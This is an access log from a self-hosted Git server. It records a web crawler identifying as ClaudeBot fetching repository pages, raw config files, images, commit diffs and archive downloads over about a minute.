"/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fsemiyearly" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 190686] [Gzip 12.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fdaily" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 10993] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/998d733eb52423ffff2f8602efdfb1282198a61f.zip" [Client 216.73.216.188] [Length 25551920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/63aec54418d3c1735d68bf046c7a9e78a247798d.zip" [Client 216.73.216.188] [Length 25552511] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.tar.gz" [Client 216.73.216.188] [Length 25538862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.tar.gz" [Client 216.73.216.188] [Length 25642081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19870] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 57815] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10815] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11531] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9865] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 57842] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Fmonthly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 458437] [Gzip 15.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 10965] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 10966] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=nginx.conf" [Client 216.73.216.188] [Length 18901] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 458451] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 204086] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 10994] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Factivity%2Frecent-commits" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 